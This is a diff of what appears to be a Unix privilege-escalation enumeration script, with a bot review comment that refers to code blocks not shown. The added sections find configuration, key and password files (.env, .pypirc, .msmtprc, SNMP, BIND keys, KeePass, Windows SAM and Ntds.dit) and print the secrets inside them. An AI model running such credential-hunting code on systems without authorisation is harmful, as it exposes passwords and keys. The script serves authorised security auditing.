[ -d /etc/skey/ ]; then echo "${GREEN}S/Key authentication enabled, but has not been initialized" - elif [ -w /etc/skey/ ]; then + elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then echo "${RED}/etc/skey/ is writable by you" ls -ld /etc/skey/ else @@ -2740,12 +2567,12 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) YubiKey athentication - printf $Y"[+] "$GREEN"YubiKey authentication\n"$NC + print_2title "YubiKey authentication" if [ "`grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep yubikey`" ]; then printf "System supports$RED YubiKey$NC authentication\n" - if [ -w /var/db/yubikey/ ]; then + if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then echo "${RED}/var/db/yubikey/ is writable by you" - ls -ld /var/db/yubikey/ + ls -ld /var/db/yubikey/ else ls -ld /var/db/yubikey/ 2>/dev/null fi 
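Review bot: The Chrome block runs `cat "$f" 2>/dev/null | grep -IEv "^$"` on each `google-chrome$` match, but those matches are profile directories (the removed code took them from `$FIND_DIR_HOME` and `find`-ed History, Cookies, Login Data and the other artifacts inside them), so the `cat` fails silently and the per-artifact listing the old code produced is lost; the Firefox block immediately above shows the intended shape, one `find "$f" -name ...` loop per artifact. The `.svn` block's `ls -lRA "$f"` has neither `2>/dev/null` nor an output cap although its title says "(limit 70)", so a large checkout floods the report; `ls -lRA "$f" 2>/dev/null | head -n 70` would keep it bounded. The `(limit 70)` wording is also only enforced in the Docker block (`head -n 70`); the other `printf "%s" "$PSTORAGE_..." | grep ... | while read f` loops in this hunk have no limit, unless the `PSTORAGE_*` variables are already truncated where they are filled, which is outside this hunk.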
@@ -2753,31 +2580,129 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) Passwords inside pam.d - printf $Y"[+] "$GREEN"Passwords inside pam.d\n"$NC - grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${C}[1;31m&${C}[0m," + print_2title "Passwords inside pam.d" + grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" - #-- SI) FastCGI params - printf $Y"[+] "$GREEN"FastCGI Params\n"$NC - fastcgi_paramsfiles=$(echo "$FIND_HOME\n$FIND_ETC\n$FIND_VAR\n$FIND_TMP\n$FIND_OPT\n$FIND_USR\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_APPLICATIONS" | grep -E 'fastcgi_params') - printf "%s\n" "$fastcgi_paramsfiles" | while read f; do - if [ "$f" ]; then - ls -l "$f" 2>/dev/null - cat "$f" 2>/dev/null | grep -E "DB_NAME|DB_USER|DB_PASS" | sed -${E} "s,DB_NAME|DB_USER|DB_PASS,${C}[1;31m&${C}[0m," - echo "" - fi - done - echo "" + print_2title "Analizing SNMP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SNMP\" | grep -E \"snmpd\.conf$\"`" ]; then echo_not_found "snmpd.conf"; fi; printf "%s" "$PSTORAGE_SNMP" | grep -E "snmpd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,snmpd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "rocommunity|rwcommunity|extend.*" | sed -${E} "s,rocommunity|rwcommunity|extend.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Pypirc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PYPIRC\" | grep -E \"\.pypirc$\"`" ]; then echo_not_found ".pypirc"; fi; printf "%s" "$PSTORAGE_PYPIRC" | grep -E "\.pypirc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.pypirc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username|password,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Ldaprc Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_LDAPRC\" | grep -E \"\.ldaprc$\"`" ]; then echo_not_found ".ldaprc"; fi; printf "%s" "$PSTORAGE_LDAPRC" | grep -E "\.ldaprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ldaprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Env Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ENV\" | grep -E \"\.env$\"`" ]; then echo_not_found ".env"; fi; printf "%s" "$PSTORAGE_ENV" | grep -E "\.env$" | while read f; do ls -ld "$f" | sed -${E} "s,\.env$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Msmtprc Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_MSMTPRC\" | grep -E \"\.msmtprc$\"`" ]; then echo_not_found ".msmtprc"; fi; printf "%s" "$PSTORAGE_MSMTPRC" | grep -E "\.msmtprc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.msmtprc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,user.*|password.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Keepass Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"\.kdbx$\"`" ]; then echo_not_found "*.kdbx"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "\.kdbx$" | while read f; do ls -ld "$f" | sed -${E} "s,\.kdbx$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.config.*$\"`" ]; then echo_not_found "KeePass.config*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.config.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.config.*$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.ini$\"`" ]; then echo_not_found "KeePass.ini"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.ini$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_KEEPASS\" | grep -E \"KeePass\.enforced.*$\"`" ]; then echo_not_found "KeePass.enforced*"; fi; printf "%s" "$PSTORAGE_KEEPASS" | grep -E "KeePass\.enforced.*$" | while read f; do ls -ld "$f" | sed -${E} "s,KeePass\.enforced.*$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing FTP Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"\.ftpconfig$\"`" ]; then echo_not_found "*.ftpconfig"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "\.ftpconfig$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ftpconfig$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ffftp\.ini$\"`" ]; then echo_not_found "ffftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ffftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ffftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.ini$\"`" ]; then echo_not_found "ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ftp\.config$\"`" ]; then echo_not_found "ftp.config"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ftp\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,ftp\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_FTP\" | grep -E \"ws_ftp\.ini$\"`" ]; then echo_not_found "ws_ftp.ini"; fi; printf "%s" "$PSTORAGE_FTP" | grep -E "ws_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Bind Files (limit 70)" + if ! 
[ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then echo_not_found "bind"; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; for ff in $(find "$f" -name "*"); do ls -ld "$ff" | sed -${E} "s,,${SED_RED},"; done; echo "";for ff in $(find "$f" -name "*.key"); do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing SeedDMS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then echo_not_found "seeddms*"; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; for ff in $(find "$f" -name "settings.xml"); do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Ddclient Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then echo_not_found "ddclient.conf"; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; + + + + + print_2title "Analizing Interesting logs Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then echo_not_found "access.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then echo_not_found "error.log"; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Windows Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then echo_not_found "unattend.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then echo_not_found "*.rdg"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then echo_not_found "AppEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then echo_not_found "ConsoleHost_history.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then echo_not_found "FreeSSHDservice.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then echo_not_found "NetSetup.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then echo_not_found "Ntds.dit"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then echo_not_found "RDCMan.settings"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then echo_not_found "SAM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then echo_not_found "SYSTEM"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then echo_not_found "SecEvent.Evt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then echo_not_found "appcmd.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then echo_not_found "bash.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then echo_not_found "datasources.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then echo_not_found "default.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then echo_not_found "drives.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then echo_not_found "groups.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then echo_not_found "https-xampp.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then echo_not_found "https.conf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then echo_not_found "iis6.log"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then echo_not_found "index.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then echo_not_found "my.cnf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then echo_not_found "my.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then echo_not_found "ntuser.dat"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then echo_not_found "pagefile.sys"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"php\.ini$\"`" ]; then echo_not_found "php.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "php\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,php\.ini$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then echo_not_found "printers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then echo_not_found "recentservers.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then echo_not_found "scclient.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then echo_not_found "scheduledtasks.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security$\"`" ]; then echo_not_found "security"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security$" | while read f; do ls -ld "$f" | sed -${E} "s,security$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then echo_not_found "security.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then echo_not_found "server.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"services\.xml$\"`" ]; then echo_not_found "services.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "services\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,services\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then echo_not_found "setupinfo"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then echo_not_found "setupinfo.bak"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then echo_not_found "sitemanager.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then echo_not_found "sites.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then echo_not_found "software"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then echo_not_found "software.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then echo_not_found "sysprep.inf"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then echo_not_found "sysprep.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then echo_not_found "system.sav"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then echo_not_found "unattend.txt"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then echo_not_found "unattend.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then echo_not_found "unattended.xml"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then echo_not_found "wcx_ftp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"web.*\.config$\"`" ]; then echo_not_found "web*.config"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"winscp\.ini$\"`" ]; then echo_not_found "winscp.ini"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wsl\.exe$\"`" ]; then echo_not_found "wsl.exe"; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; + + + print_2title "Analizing Other Interesting Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.bashrc$\"`" ]; then echo_not_found ".bashrc"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.bashrc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.google_authenticator$\"`" ]; then echo_not_found ".google_authenticator"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.google_authenticator$" | while read f; do ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"hosts\.equiv$\"`" ]; then echo_not_found "hosts.equiv"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "hosts\.equiv$" | while read f; do ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo ""; + if ! 
[ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.lesshst$\"`" ]; then echo_not_found ".lesshst"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.lesshst$" | while read f; do ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.plan$\"`" ]; then echo_not_found ".plan"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.plan$" | while read f; do ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.profile$\"`" ]; then echo_not_found ".profile"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.profile$" | while read f; do ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.recently-used\.xbel$\"`" ]; then echo_not_found ".recently-used.xbel"; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING_FILES" | grep -E "\.recently-used\.xbel$" | while read f; do ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING_FILES\" | grep -E \"\.rhosts$\"`" ]; then echo_not_found ".rhosts"; fi; 